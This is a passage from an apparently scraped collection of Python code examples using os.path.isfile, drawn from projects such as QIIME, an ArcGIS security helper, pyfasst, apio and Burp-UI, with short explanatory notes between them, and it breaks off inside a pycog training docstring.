sortmerna_coverage = opts.sortmerna_coverage
sortmerna_db = opts.sortmerna_db
if assignment_method == 'sortmerna':
# similarity must be between (0,1]
if not 0 < similarity <= 1:
option_parser.error('--similarity must be between (0,1].')
# coverage must be between (0,1]
if not 0 < sortmerna_coverage <= 1:
option_parser.error('--sortmerna_coverage must be '
'between (0,1].')
# check ID to taxonomy filepath
if not opts.id_to_taxonomy_fp:
option_parser.error('--id_to_taxonomy_fp is required when '
'assigning with sortmerna.')
# check reference sequences filepath
if not opts.reference_seqs_fp:
option_parser.error('sortmerna always requires --reference_seqs_fp '
'(with or without sortmerna_db)')
# check indexed database, if provided (not mandatory)
elif sortmerna_db:
if isfile(sortmerna_db + '.stats') is False:
option_parser.error('%s does not exist, make sure you have '
'indexed the database using indexdb_rna' %
(sortmerna_db + '.stats'))
if assignment_method == 'blast':
if not opts.id_to_taxonomy_fp:
option_parser.error('--id_to_taxonomy_fp is required when '
'assigning with blast.')
if not (opts.reference_seqs_fp or opts.blast_db):
option_parser.error('Either a blast db (via -b) or a collection '
'of reference sequences (via -r) must be '
'passed to assign taxonomy using blast.')
if assignment_method == 'rdp':
try:
validate_rdp_version()
except RuntimeError as e:
option_parser.error(e)
if opts.id_to_taxonomy_fp is not None:
if opts.reference_seqs_fp is None:
option_parser.error(
'A filepath for reference sequences must be '
'specified (via -r) along with the id_to_taxonomy '
'file to train the Rdp Classifier.')
elif opts.reference_seqs_fp is not None:
option_parser.error(
'A filepath for an id to taxonomy map must be '
'specified (via -t) along with the reference '
'sequences fp to train the Rdp Classifier.')
else:
pass
if assignment_method == 'uclust':
if opts.id_to_taxonomy_fp is None:
option_parser.error('--id_to_taxonomy_fp is required when '
'assigning with uclust.')
if opts.reference_seqs_fp is None:
option_parser.error('--reference_seqs_fp is required when '
'assigning with uclust.')
if assignment_method == 'rtax':
if opts.id_to_taxonomy_fp is None or opts.reference_seqs_fp is None:
option_parser.error('RTAX classification requires both a filepath for '
'reference sequences (via -r) and an id_to_taxonomy '
'file (via -t).')
if opts.read_1_seqs_fp is None: # or opts.read_2_seqs_fp is None:
option_parser.error('RTAX classification requires the FASTA files '
'produced by split_illumina_fastq.py for both reads, '
'in addition to the cluster representatives. Pass '
'these via --read_1_seqs_fp and --read_2_seqs_fp.')
if assignment_method == 'mothur':
if None in [opts.id_to_taxonomy_fp, opts.reference_seqs_fp]:
option_parser.error(
'Mothur classification requires both a filepath for '
'reference sequences (via -r) and an id_to_taxonomy '
'file (via -t).')
taxon_assigner_constructor =\
assignment_method_constructors[assignment_method]
input_sequences_filepath = opts.input_fasta_fp
try:
id_to_taxonomy_fp = opts.id_to_taxonomy_fp
params = {'id_to_taxonomy_filepath': id_to_taxonomy_fp}
except IndexError:
params = {}
# Build the output filenames
output_dir = opts.output_dir or assignment_method + '_assigned_taxonomy'
try:
mkdir(output_dir)
except OSError:
# output_dir already exists
pass
fpath, ext = splitext(input_sequences_filepath)
input_dir, fname = split(fpath)
result_path = output_dir + '/' + fname + '_tax_assignments.txt'
log_path = output_dir + '/' + fname + '_tax_assignments.log'
if assignment_method == 'blast':
# one of these must have a value, otherwise we'd have
# an optparse error
if opts.blast_db:
params['blast_db'] = opts.blast_db
else:
params['reference_seqs_filepath'] = opts.reference_seqs_fp
params['Max E value'] = opts.blast_e_value
elif assignment_method == 'mothur':
params['Confidence'] = opts.confidence
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
elif assignment_method == 'uclust':
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params['min_consensus_fraction'] = opts.min_consensus_fraction
params['similarity'] = similarity
params['max_accepts'] = opts.uclust_max_accepts
elif assignment_method == 'sortmerna':
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params['sortmerna_db'] = sortmerna_db
params['min_consensus_fraction'] = opts.min_consensus_fraction
params['min_percent_id'] = float(similarity*100.0)
params['min_percent_cov'] = float(sortmerna_coverage*100.0)
params['best_N_alignments'] = opts.sortmerna_best_N_alignments
params['e_value'] = opts.sortmerna_e_value
params['threads'] = opts.sortmerna_threads
elif assignment_method == 'rdp':
params['Confidence'] = opts.confidence
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params[
'training_data_properties_fp'] = opts.training_data_properties_fp
params['max_memory'] = "%sM" % opts.rdp_max_memory
elif assignment_method == 'rtax':
params['id_to_taxonomy_fp'] = opts.id_to_taxonomy_fp
params['reference_sequences_fp'] = opts.reference_seqs_fp
params['read_1_seqs_fp'] = opts.read_1_seqs_fp
params['read_2_seqs_fp'] = opts.read_2_seqs_fp
params['single_ok'] = opts.single_ok
params['no_single_ok_generic'] = opts.no_single_ok_generic
params['header_id_regex'] = opts.header_id_regex
params['read_id_regex'] = opts.read_id_regex
params['amplicon_id_regex'] = opts.amplicon_id_regex
else:
# should not be able to get here as an unknown classifier would
# have raised an optparse error
exit(1)
fd, temp_result_path = mkstemp(prefix='assign-tax')
close(fd)
taxon_assigner = taxon_assigner_constructor(params)
if assignment_method == "sortmerna":
taxon_assigner(input_sequences_filepath,
result_path=result_path,
log_path=log_path)
else:
taxon_assigner(input_sequences_filepath,
result_path=temp_result_path,
log_path=log_path)
# This is an ugly hack, and needs to be pushed upstream to
# the taxon assigners (except for sortmerna, which already outputs
# only the first field for all headers in the Blast tabular output).
# The output taxonomy maps that are returned by the taxon assigners
# contain the full sequence headers as the first field (so including
# "comment" text in the fasta headers), but for consistency with the
# input taxonomy maps, should only contain the sequence identifier.
# This modifies those entries to contain only the sequence identifier,
# discarding any comment information. The formatting of these result
# files needs to be centralized, and at that stage this processing
# should happen there rather than here.
result_f = open(result_path, 'w')
for line in open(temp_result_path, 'U'):
fields = line.strip().split('\t')
seq_id = fields[0].split()[0]
result_f.write('%s\t%s\n' % (seq_id, '\t'.join(fields[1:])))
result_f.close()
remove_files([temp_result_path])
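In this example the interesting file handling happens around the assignment call: the output directory is created with a try/mkdir/except OSError, results are first written to a temporary file from tempfile.mkstemp, and the file is then rewritten with the sequence headers trimmed to bare identifiers. Below is a minimal Python 3 sketch of that same pattern using only the standard library; the directory name and the rewrite_first_field helper are illustrative, not part of QIIME, and os.makedirs(..., exist_ok=True) is shown as an alternative to the try/except OSError idiom above.

import os
from os import close, remove
from tempfile import mkstemp

def rewrite_first_field(temp_path, final_path):
    # Keep only the sequence identifier (text before the first space)
    # in the first tab-separated column, mirroring the post-processing above.
    with open(temp_path) as src, open(final_path, 'w') as dst:
        for line in src:
            fields = line.rstrip('\n').split('\t')
            if not fields[0].strip():
                continue
            seq_id = fields[0].split()[0]
            dst.write('%s\t%s\n' % (seq_id, '\t'.join(fields[1:])))

output_dir = 'uclust_assigned_taxonomy'      # hypothetical output directory
os.makedirs(output_dir, exist_ok=True)       # replaces the try/mkdir/except OSError idiom
fd, temp_result_path = mkstemp(prefix='assign-tax')
close(fd)
# ... the taxon assigner would write its output to temp_result_path here ...
rewrite_first_field(temp_result_path, os.path.join(output_dir, 'seqs_tax_assignments.txt'))
remove(temp_result_path)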
0
Example 79
Project: executive-dashboard Source File: securityhandlerhelper.py
def __init__(self, securityinfo):
"""Constructor"""
try:
if not securityinfo is None:
if isinstance(securityinfo,securityhandlerhelper):
self._securityHandler = securityinfo.securityhandler
self._username = securityinfo._username
self._password = securityinfo._password
self._proxy_url = securityinfo._proxy_url
self._proxy_port = securityinfo._proxy_port
self._token_url = securityinfo._token_url
self._security_type = securityinfo._security_type
self._featureServiceFieldCase = securityinfo._featureServiceFieldCase
self._keyfile = securityinfo._keyfile
self._certificatefile = securityinfo._certificatefile
self._referer_url = securityinfo._referer_url
self._client_id = securityinfo._client_id
self._secret_id = securityinfo._secret_id
self._is_portal = securityinfo._is_portal
self._message = securityinfo._message
self._valid = securityinfo._valid
#self._securityHandler = securityinfo
return
else:
pass
if isinstance(securityinfo,str) and os.path.isfile(securityinfo):
securityinfo = common.init_config_json(config_file=securityinfo)
if 'Credentials' in securityinfo:
securityinfo = securityinfo['Credentials']
if 'security_type' in securityinfo:
self._security_type = securityinfo['security_type']
else:
self._security_type = 'Portal'
if not any(self._security_type in s for s in self._supported_types):
self._message = 'Security type not supported: ' + self._security_type
self._valid = False
return
if 'proxy_url' in securityinfo:
self._proxy_url = securityinfo['proxy_url']
if 'proxy_port' in securityinfo:
self._proxy_port = securityinfo['proxy_port']
if 'referer_url' in securityinfo:
self._referer_url = securityinfo['referer_url']
if 'token_url' in securityinfo and securityinfo['token_url'] is not None:
self._token_url = securityinfo['token_url']
if not self._token_url.startswith('http://') and \
not self._token_url.startswith('https://'):
self._token_url = 'https://' + self._token_url
if 'org_url' in securityinfo and securityinfo['org_url'] is not None:
self._org_url = securityinfo['org_url']
if not self._org_url.startswith('http://') and not self._org_url.startswith('https://'):
self._org_url = 'http://' + self._org_url
if 'username' in securityinfo:
self._username = securityinfo['username']
if 'password' in securityinfo:
self._password = securityinfo['password']
if 'certificatefile' in securityinfo:
self._certificatefile = securityinfo['certificatefile']
if 'keyfile' in securityinfo:
self._keyfile = securityinfo['keyfile']
if 'client_id' in securityinfo:
self._client_id = securityinfo['client_id']
if 'secret_id' in securityinfo:
self._secret_id = securityinfo['secret_id']
if str(self._security_type).upper() == 'ArcGIS'.upper():
self._securityHandler = security.ArcGISTokenSecurityHandler(proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._org_url = self._securityHandler.org_url
self._username = self._securityHandler.username
self._valid = True
self._message = "ArcGIS security handler created"
elif str(self._security_type).upper() == 'Portal'.upper() or \
str(self._security_type).upper() == 'AGOL'.upper():
if self._org_url is None or self._org_url == '':
self._org_url = 'http://www.arcgis.com'
if self._username is None or self._username == '' or \
self._password is None or self._password == '':
self._message = "No username or password, no security handler generated"
self._valid = True
else:
if self._org_url is None or '.arcgis.com' in self._org_url:
self._securityHandler = security.AGOLTokenSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
token_url=self._token_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._org_url = self._securityHandler.org_url
self._message = "ArcGIS Online security handler created"
else:
self._securityHandler = security.PortalTokenSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._message = "Portal security handler created"
elif str(self._security_type).upper() == 'NTLM'.upper():
if self._username is None or self._username == '' or \
self._password is None or self._password == '':
self._message = "Username and password required for NTLM"
self._valid = False
else:
self._securityHandler = security.NTLMSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port,
referer_url=self._referer_url)
self._message = "NTLM security handler created"
elif str(self._security_type).upper() == 'LDAP'.upper():
if self._username is None or self._username == '' or \
self._password is None or self._password == '':
self._message = "Username and password required for LDAP"
self._valid = False
else:
self._securityHandler = security.LDAPSecurityHandler(username=self._username,
password=self._password,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port,
referer_url=self._referer_url)
self._message = "LDAP security handler created"
elif str(self._security_type).upper() == 'PKI'.upper():
if self._keyfile is None or self._keyfile == '' or \
self._certificatefile is None or self._certificatefile == '':
self._message = "Key file and certification file required for PKI"
self._valid = False
else:
self._securityHandler = security.PKISecurityHandler(keyfile = self._keyfile,
certificatefile = self._certificatefile,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port,
referer_url=self._referer_url)
self._message = "PKI security handler created"
elif str(securityinfo['security_type']).upper() == 'OAUTH'.upper():
if self._secret_id is None or self._secret_id == '' or \
self._client_id is None or self._client_id == '':
self._message = "client_id and secret_id required for OAUTH"
self._valid = False
else:
self._securityHandler = security.OAuthSecurityHandler(client_id=self._client_id,
secret_id = self._secret_id,
org_url=self._org_url,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
self._message = "OAuth security handler created"
else:
print ("No valid security type set")
self._message = "No valid security type set"
if self._securityHandler is not None:
admin = Administration(url=self._org_url,
securityHandler=self._securityHandler)
try:
portal = admin.portals.portalSelf
if portal.featureServers is not None:
for hostingServer in portal.featureServers:
if hostingServer is not None:
if isinstance(hostingServer, AGSAdministration):
try:
serData = hostingServer.data
dataItems = serData.rootDataItems
if dataItems is not None:
if 'rootItems' in dataItems:
for rootItem in dataItems['rootItems']:
if rootItem == '/enterpriseDatabases':
rootItems = serData.findDataItems(ancestorPath=rootItem,type='fgdb,egdb')
if not rootItems is None and 'items' in rootItems:
for item in rootItems['items']:
if 'info' in item:
if 'isManaged' in item['info'] and item['info']['isManaged'] == True:
conStrDic = {}
conStr = item['info']['connectionString'].split(";")
for conStrValue in conStr:
spltval = conStrValue.split("=")
conStrDic[spltval[0]] = spltval[1]
if 'DBCLIENT' in conStrDic:
if str(conStrDic['DBCLIENT']).upper() == 'postgresql'.upper():
self._featureServiceFieldCase = 'lower'
except HTTPError as err:
if err.code == 403:
print ("Admistrative access denied, unable to check if hosting servers")
else:
print (err)
except Exception as e:
print (e)
except HTTPError as err:
if err.code == 403:
print ("Admistrative access denied, unable to check if hosting servers")
else:
print (err)
except Exception as e:
print (e)
if 'error' in self._securityHandler.message:
self._message = self._securityHandler.message
self._valid = False
else:
if self._securityHandler.message is not None:
self._message = self._securityHandler.message
self._valid = True
else:
self._message = 'Security info not set'
self._valid = True
except ValueError as e:
raise e
except Exception as e:
line, filename, synerror = trace()
raise common.ArcRestHelperError({
"function": "securityhandlerhelper_init",
"line": line,
"filename": filename,
"synerror": synerror,
})
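Here os.path.isfile is what lets the constructor accept either a credentials dictionary or a path to a JSON config file: a string argument that points at an existing file is loaded before the rest of the checks run. A hedged sketch of that dict-or-path pattern with the standard json module (the function name is hypothetical, not part of the ArcREST helpers):

import json
import os

def load_security_info(securityinfo):
    """Return a credentials dict, whether given a dict or a path to a JSON file."""
    if isinstance(securityinfo, str) and os.path.isfile(securityinfo):
        # Only strings that name an existing file are treated as config paths.
        with open(securityinfo) as fh:
            securityinfo = json.load(fh)
    if isinstance(securityinfo, dict) and 'Credentials' in securityinfo:
        securityinfo = securityinfo['Credentials']
    return securityinfo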
0
Example 80
Project: pyfasst Source File: separateLeadFunctions.py
def generate_WF0_MinQT_chirped(minF0, maxF0, cqtfmax, cqtfmin, cqtbins=48.,
Fs=44100., Nfft=2048, stepNotes=4, \
lengthWindow=2048, Ot=0.5, perF0=1, \
depthChirpInSemiTone=0.5, loadWF0=True,
analysisWindow='hanning',
atomHopFactor=0.25,
cqtWinFunc=np.hanning, verbose=False):
"""\
Generates a 'basis' matrix for the source part WF0, using the
source model KLGLOTT88, with the following I/O arguments:
Inputs:
:param minF0:
the minimum value for the fundamental
frequency (F0)
:param maxF0:
the maximum value for F0
:param cqtfmax: ...
:param Fs:
the desired sampling rate
:param Nfft:
the number of bins to compute the Fourier
transform
:param stepNotes:
the number of F0 per semitone
:param lengthWindow:
the size of the window for the Fourier
transform
:param Ot:
the glottal opening coefficient for
KLGLOTT88
:param perF0:
the number of chirps considered per F0
value
:param depthChirpInSemiTone:
the maximum value, in semitone, of the
allowed chirp per F0
Outputs:
:returns:
* `F0Table` -
the vector containing the values of the fundamental
frequencies in Hertz (Hz) corresponding to the
harmonic combs in WF0, i.e. the columns of WF0
* `WF0` -
the basis matrix, where each column is a harmonic comb
generated by KLGLOTT88 (with a sinusoidal model, then
transformed into the spectral domain)
20120828T2358 Horribly slow...
"""
# note: cqtfmax should actually be computed so as to guarantee
# the desired Nfft: - not necessary for minqt anymore
# cqtfmax = np.ceil(3. * Fs / (Nfft * (2**(1./cqtbins) - 1)))
# strange things happening to FFTLen...
if verbose>1: print "cqtfmax set to", cqtfmax
mqt = minqt.MinQTransfo(linFTLen=Nfft,
fmin=cqtfmin,
fmax=cqtfmax,
bins=cqtbins,
fs=Fs,
perfRast=1,
verbose=verbose,
winFunc=cqtWinFunc,
atomHopFactor=atomHopFactor)
# getting the right window length:
# in particular, it should not be less than the biggest window
# used by the minqt transform:
lengthWindow = np.maximum(lengthWindow,
mqt.cqtkernel.FFTLen *
(2**(mqt.octaveNr-1)))
# generating a filename to keep data:
filename = str('').join(['wf0minqt_',
'_minF0-', str(minF0),
'_maxF0-', str(maxF0),
'_cqtfmax-', str(cqtfmax),
'_cqtfmin-', str(cqtfmin),
'_cqtbins-', str(cqtbins),
'_Fs-', str(int(Fs)),
'_Nfft-', str(int(Nfft)),
'_atomHopFactor-%.2f' %(atomHopFactor),
'_stepNotes-', str(int(stepNotes)),
'_Ot-', str(Ot),
'_perF0-', str(int(perF0)),
'_depthChirp-', str(depthChirpInSemiTone),
'_analysisWindow-', analysisWindow,
'_lengthWindow-%d' %(int(lengthWindow)),
'_cqtwinfunc-', cqtWinFunc.__name__,
'.npz'])
if os.path.isfile(filename) and loadWF0:
print "Reading WF0 and F0Table from stored arrays in %s." %filename
struc = np.load(filename)
return struc['F0Table'], struc['WF0'], struc['mqt'].tolist()
else:
print "No such file: %s." %filename
print "First time WF0 computed with these parameters, please wait..."
# converting to double arrays:
minF0=np.double(minF0)
maxF0=np.double(maxF0)
Fs=np.double(Fs)
stepNotes=np.double(stepNotes)
# computing the F0 table:
numberOfF0 = np.ceil(12.0 * stepNotes * np.log2(maxF0 / minF0)) + 1
F0Table=minF0 * (2 ** (np.arange(numberOfF0,dtype=np.double) \
/ (12 * stepNotes)))
numberElementsInWF0 = numberOfF0 * perF0
if verbose>2:
print mqt.cqtkernel
print mqt.fmin, mqt.fmax, mqt.linFTLen, mqt.octaveNr, mqt.linBins
# computing the desired WF0 matrix
WF0 = np.zeros([mqt.freqbins,
numberElementsInWF0],
dtype=np.double)
# slow... try faster : concatenate the odgd, compute one big cqt of that
# result and extract only the desired frames:
##odgds = np.array([])
for fundamentalFrequency in np.arange(numberOfF0):
if verbose>0:
print " f0 n.", fundamentalFrequency+1, "/", numberOfF0
odgd, odgdSpec = \
generate_ODGD_spec(F0Table[fundamentalFrequency], Fs, \
Ot=Ot, lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0,\
analysisWindowType=analysisWindow)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2. - mqt.time_stamps)**2)
if verbose>1: print midindex, mqt.transfo.shape, WF0.shape
WF0[:,fundamentalFrequency * perF0] = np.abs(mqt.transfo[:,midindex])**2
# del mqt.transfo # maybe needed but might slow down even more...
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##print odgds.shape, odgd.shape
for chirpNumber in np.arange(perF0 - 1):
F2 = F0Table[fundamentalFrequency] \
* (2 ** ((chirpNumber + 1.0) * depthChirpInSemiTone \
/ (12.0 * (perF0 - 1.0))))
# F0 is the mean of F1 and F2.
F1 = 2.0 * F0Table[fundamentalFrequency] - F2
odgd, odgdSpec = \
generate_ODGD_spec_chirped(F1, F2, Fs, \
Ot=Ot, \
lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2.
- mqt.time_stamps)**2)
WF0[:,fundamentalFrequency * perF0 + chirpNumber + 1] = \
np.abs(mqt.transfo[:,midindex]) ** 2
# del mqt.transfo # idem
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##hybt.computeHybrid(data=odgds)
##midindex = np.argmin((lengthWindow / 2. + lengthWindow
## * np.vstack(np.arange(numberElementsInWF0))
## - hybt.time_stamps)**2, axis=1)
##if verbose>1: print midindex
##WF0 = np.abs(hybt.spCQT[:,midindex]) ** 2
np.savez(filename, F0Table=F0Table, WF0=WF0, mqt=mqt)
return F0Table, WF0, mqt #, hybt, odgds
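Example 80 encodes every generation parameter in a long cache filename and uses os.path.isfile to decide between loading the stored .npz and recomputing the WF0 basis. A minimal sketch of that compute-or-load caching pattern with numpy (the helper name, array keys and the toy compute function are illustrative only):

import os
import numpy as np

def cached_basis(filename, compute, load_cache=True):
    # Load the arrays if a cache file exists, otherwise compute and save them.
    if load_cache and os.path.isfile(filename):
        data = np.load(filename)
        return data['F0Table'], data['WF0']
    F0Table, WF0 = compute()
    np.savez(filename, F0Table=F0Table, WF0=WF0)
    return F0Table, WF0

# usage sketch:
# F0Table, WF0 = cached_basis('wf0_cache.npz', lambda: (np.arange(10.0), np.eye(10)))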
0
Example 81
Project: apio Source File: scons.py
def process_arguments(self, args):
# -- Check arguments
var_board = args['board']
var_fpga = args['fpga']
var_size = args['size']
var_type = args['type']
var_pack = args['pack']
# TODO: reduce code size
if var_board:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board', fg='yellow')
if var_board in self.resources.boards:
fpga = self.resources.boards[var_board]['fpga']
if fpga in self.resources.fpgas:
fpga_size = self.resources.fpgas[fpga]['size']
fpga_type = self.resources.fpgas[fpga]['type']
fpga_pack = self.resources.fpgas[fpga]['pack']
redundant_arguments = []
contradictory_arguments = []
if var_fpga:
if var_fpga in self.resources.fpgas:
if var_fpga == fpga:
# Redundant argument
redundant_arguments += ['fpga']
else:
# Contradictory argument
contradictory_arguments += ['fpga']
else:
# Unknown fpga
click.secho(
'Error: unknown fpga: {0}'.format(
var_fpga), fg='red')
return 1
if var_size:
if var_size == fpga_size:
# Redundant argument
redundant_arguments += ['size']
else:
# Contradictory argument
contradictory_arguments += ['size']
if var_type:
if var_type == fpga_type:
# Redundant argument
redundant_arguments += ['type']
else:
# Contradictory argument
contradictory_arguments += ['type']
if var_pack:
if var_pack == fpga_pack:
# Redundant argument
redundant_arguments += ['pack']
else:
# Contradictory argument
contradictory_arguments += ['pack']
if redundant_arguments:
# Redundant argument
click.secho(
'Warning: redundant arguments: {}'.format(
', '.join(redundant_arguments)), fg='yellow')
if contradictory_arguments:
# Contradictory argument
click.secho(
'Error: contradictory arguments: {}'.format(
', '.join(contradictory_arguments)), fg='red')
return 1
else:
# Unknown fpga
pass
else:
# Unknown board
click.secho(
'Error: unknown board: {0}'.format(var_board), fg='red')
return 1
else:
if var_fpga:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board', fg='yellow')
if var_fpga in self.resources.fpgas:
fpga_size = self.resources.fpgas[var_fpga]['size']
fpga_type = self.resources.fpgas[var_fpga]['type']
fpga_pack = self.resources.fpgas[var_fpga]['pack']
redundant_arguments = []
contradictory_arguments = []
if var_size:
if var_size == fpga_size:
# Redundant argument
redundant_arguments += ['size']
else:
# Contradictory argument
contradictory_arguments += ['size']
if var_type:
if var_type == fpga_type:
# Redundant argument
redundant_arguments += ['type']
else:
# Contradictory argument
contradictory_arguments += ['type']
if var_pack:
if var_pack == fpga_pack:
# Redundant argument
redundant_arguments += ['pack']
else:
# Contradictory argument
contradictory_arguments += ['pack']
if redundant_arguments:
# Redundant argument
click.secho(
'Warning: redundant arguments: {}'.format(
', '.join(redundant_arguments)), fg='yellow')
if contradictory_arguments:
# Contradictory argument
click.secho(
'Error: contradictory arguments: {}'.format(
', '.join(contradictory_arguments)), fg='red')
return 1
else:
# Unknown fpga
click.secho(
'Error: unknown fpga: {0}'.format(var_fpga), fg='red')
return 1
else:
if var_size and var_type and var_pack:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board', fg='yellow')
fpga_size = var_size
fpga_type = var_type
fpga_pack = var_pack
else:
if not var_size and not var_type and not var_pack:
# No arguments: use apio.ini board
p = Project()
p.read()
if p.board:
var_board = p.board
click.secho(
'Info: use apio.ini board: {}'.format(
var_board))
fpga = self.resources.boards[var_board]['fpga']
fpga_size = self.resources.fpgas[fpga]['size']
fpga_type = self.resources.fpgas[fpga]['type']
fpga_pack = self.resources.fpgas[fpga]['pack']
else:
click.secho(
'Error: insufficient arguments: missing board',
fg='red')
click.secho(
'You have two options:\n' +
' 1) Execute your command with\n' +
' `--board <boardname>`\n' +
' 2) Create an ini file using\n' +
' `apio init --board <boardname>`',
fg='yellow')
return 1
else:
if isfile('apio.ini'):
click.secho('Info: ignore apio.ini board',
fg='yellow')
# Insufficient arguments
missing = []
if not var_size:
missing += ['size']
if not var_type:
missing += ['type']
if not var_pack:
missing += ['pack']
pass
click.secho(
'Error: insufficient arguments: missing {}'.format(
', '.join(missing)), fg='red')
return 1
# -- Build Scons variables list
variables = self.format_vars({
'fpga_size': fpga_size,
'fpga_type': fpga_type,
'fpga_pack': fpga_pack
})
return variables, var_board
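In this example isfile('apio.ini') is not used to load anything; it only warns the user that the project file will be ignored whenever board/FPGA details are passed on the command line. A small sketch of that warning pattern, assuming click (the same third-party CLI library the example already uses; print would do equally well):

import os.path

import click

def warn_if_project_file_ignored(explicit_board):
    # When an explicit --board is given, an existing apio.ini is ignored.
    if explicit_board and os.path.isfile('apio.ini'):
        click.secho('Info: ignore apio.ini board', fg='yellow')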
0
Example 82
def __init__(self, server=None, conf=None, dummy=False):
"""The :class:`burpui.misc.backend.burp1.Burp` class provides a consistent
backend for ``burp-1`` servers.
It implements the :class:`burpui.misc.backend.interface.BUIbackend` class
in order to have consistent data whatever backend is used.
:param server: ``Burp-UI`` server instance in order to access logger
and/or some global settings
:type server: :class:`burpui.server.BUIServer`
:param conf: Configuration to use
:type conf: :class:`burpui.config.BUIConfig`
:param dummy: Does not instantiate the object (used for development
purposes)
:type dummy: boolean
"""
if dummy:
return
self.client_version = None
self.server_version = None
self.app = None
self.zip64 = G_ZIP64
self.host = G_BURPHOST
self.port = G_BURPPORT
self.burpbin = G_BURPBIN
self.stripbin = G_STRIPBIN
self.burpconfcli = G_BURPCONFCLI
self.burpconfsrv = G_BURPCONFSRV
self.includes = G_INCLUDES
self.revoke = G_REVOKE
self.enforce = G_ENFORCE
self.running = []
self.defaults = {
'Burp1': {
'bport': G_BURPPORT,
'bhost': G_BURPHOST,
'burpbin': G_BURPBIN,
'stripbin': G_STRIPBIN,
'bconfcli': G_BURPCONFCLI,
'bconfsrv': G_BURPCONFSRV,
'tmpdir': G_TMPDIR,
},
'Experimental': {
'zip64': G_ZIP64,
},
'Security': {
'includes': G_INCLUDES,
'revoke': G_REVOKE,
'enforce': G_ENFORCE,
},
}
tmpdir = G_TMPDIR
if conf is not None:
conf.update_defaults(self.defaults)
conf.default_section('Burp1')
self.port = conf.safe_get('bport', 'integer')
self.host = conf.safe_get('bhost')
self.burpbin = self._get_binary_path(
conf,
'burpbin',
G_BURPBIN
)
self.stripbin = self._get_binary_path(
conf,
'stripbin',
G_STRIPBIN
)
confcli = conf.safe_get('bconfcli')
confsrv = conf.safe_get('bconfsrv')
tmpdir = conf.safe_get('tmpdir')
# Experimental options
self.zip64 = conf.safe_get(
'zip64',
'boolean',
section='Experimental'
)
# Security options
self.includes = conf.safe_get(
'includes',
'force_list',
section='Security'
)
self.enforce = conf.safe_get(
'enforce',
'boolean',
section='Security'
)
self.revoke = conf.safe_get(
'revoke',
'boolean',
section='Security'
)
if confcli and not os.path.isfile(confcli):
self.logger.warning("The file '%s' does not exist", confcli)
confcli = None
if confsrv and not os.path.isfile(confsrv):
self.logger.warning("The file '%s' does not exist", confsrv)
confsrv = None
if self.host not in ['127.0.0.1', '::1']:
self.logger.warning("Invalid value for 'bhost'. Must be '127.0.0.1' or '::1'. Falling back to '%s'", G_BURPHOST)
self.host = G_BURPHOST
self.burpconfcli = confcli
self.burpconfsrv = confsrv
if tmpdir and os.path.exists(tmpdir) and not os.path.isdir(tmpdir):
self.logger.warning("'%s' is not a directory", tmpdir)
if tmpdir == G_TMPDIR:
raise IOError("Cannot use '{}' as tmpdir".format(tmpdir))
tmpdir = G_TMPDIR
if os.path.exists(tmpdir) and not os.path.isdir(tmpdir):
raise IOError("Cannot use '{}' as tmpdir".format(tmpdir))
if tmpdir and not os.path.exists(tmpdir):
os.makedirs(tmpdir)
self.tmpdir = tmpdir
self.parser = Parser(self)
self.family = Burp._get_inet_family(self.host)
self._test_burp_server_address(self.host)
try:
cmd = [self.burpbin, '-v']
self.client_version = subprocess.check_output(cmd, universal_newlines=True).rstrip().replace('burp-', '')
except:
pass
try:
cmd = [self.burpbin, '-a', 'l']
if self.burpconfcli:
cmd += ['-c', self.burpconfcli]
for line in subprocess.check_output(cmd, universal_newlines=True).split('\n'):
result = re.search(r'^.*Server version:\s+(\d+\.\d+\.\d+)', line)
if result:
self.server_version = result.group(1)
break
except:
pass
self.logger.info('burp port: {}'.format(self.port))
self.logger.info('burp host: {}'.format(self.host))
self.logger.info('burp binary: {}'.format(self.burpbin))
self.logger.info('strip binary: {}'.format(self.stripbin))
self.logger.info('burp conf cli: {}'.format(self.burpconfcli))
self.logger.info('burp conf srv: {}'.format(self.burpconfsrv))
self.logger.info('tmpdir: {}'.format(self.tmpdir))
self.logger.info('zip64: {}'.format(self.zip64))
self.logger.info('includes: {}'.format(self.includes))
self.logger.info('enforce: {}'.format(self.enforce))
self.logger.info('revoke: {}'.format(self.revoke))
try:
# make the connection
self.status()
except BUIserverException:
pass
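The Burp-UI backend validates the configured client and server configuration paths with os.path.isfile and quietly drops them (with a warning) when they do not exist, and likewise sanity-checks the tmpdir with os.path.exists/os.path.isdir. A compact sketch of that "validate or fall back to None" idiom using the logging module (the helper name and example path are hypothetical):

import logging
import os

logger = logging.getLogger(__name__)

def existing_file_or_none(path):
    # Return the path only if it points at an existing regular file.
    if path and not os.path.isfile(path):
        logger.warning("The file '%s' does not exist", path)
        return None
    return path

burpconfcli = existing_file_or_none('/etc/burp/burp.conf')  # example path only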
0
Example 83
Project: pycog Source File: sgd.py
def train(self, gradient_data, validation_data, savefile):
"""
Train the RNN.
Parameters
---------
gradient_data : pycog.Dataset
Gradient dataset.
validation_data : pycog.Dataset
Validation dataset.
savefile : str
